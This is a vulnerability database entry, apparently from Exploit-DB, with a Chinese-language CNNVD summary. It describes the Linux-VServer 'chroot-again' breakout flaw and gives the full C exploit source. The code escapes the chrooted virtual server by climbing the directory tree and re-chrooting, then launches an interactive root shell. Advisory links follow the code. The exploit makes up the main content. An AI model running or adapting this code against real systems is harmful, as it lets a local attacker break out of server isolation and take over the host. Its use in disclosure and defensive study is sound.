https://www.exploit-db.com/exploits/23658
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200402-030

Linux-VServer是一个允许用户在一个普通的Linux服务器上建立虚拟专用的服务器的软件。Linux-VServer存在典型的”chroot-again”问题，本地攻击者可以利用这个漏洞以ROOT用户权限在系统上执行任意指令。主要问题是VServer应用程序针对”chroot-again”类型的攻击没有很好的进行安全保护，攻击者可以利用这个漏洞脱离限制环境，访问限制目录之外的任意文件。

/*
source: http://www.securityfocus.com/bid/9596/info

VServer is reported prone to a breakout vulnerability that allows a malicious user to escape from the context of the chrooted root directory of the virtual server. This issue is due to the VServer application failing to secure itself against a "chroot-again" style vulnerability. Successful exploitation of this issue may allow an attacker to gain access to the filesystem outside of the chrooted root directory.
*/

/* [email protected] modified the chroot-again exploit */
/* to work on vservers with "chmod 000 /vservers" */

/* Run this code in a vserver as root */
/* Tested with 2.4.24 and vserver 1.24 */

#include <sys/types.h>
#include <sys/stat.h>

main()
{
int i;

if (chdir("/") != 0) {
  perror("cd /"); exit(1);
}
if (mkdir("baz", 0777) != 0) {
  perror("mkdir baz");
}
if (chroot("baz") != 0) {
  perror("chroot baz"); exit(1);
}

for (i=0; i<50; i++) {
   if (chdir("..") != 0) {
      perror("cd .."); /* exit(1); */
   }
   if (chmod("..", S_IXOTH) != 0) {
      perror("chmod"); /* exit(1); */
   }
}
if (chroot(".") != 0) {
  perror("chroot ."); exit(1);
}
printf("Exploit seems to work. =)n");
execl("/bin/sh", "sh", "-i", (char *)0);
perror("exec sh");
exit(0);
}

来源:www.linux-vserver.org
链接:http://www.linux-vserver.org/index.php?page=ChangeLog
来源:XF
名称:linux-vserver-gain-privileges(15073)
链接:http://xforce.iss.net/xforce/xfdb/15073
来源:BID
名称:9596
链接:http://www.securityfocus.com/bid/9596
来源:BUGTRAQ
名称:20040206Linux2.4.24withvserver1.24exploit
链接:http://www.securityfocus.com/archive/1/353003
来源:OSVDB
名称:3875
链接:http://www.osvdb.org/3875
来源:SECUNIA
名称:10816
链接:http://secunia.com/advisories/10816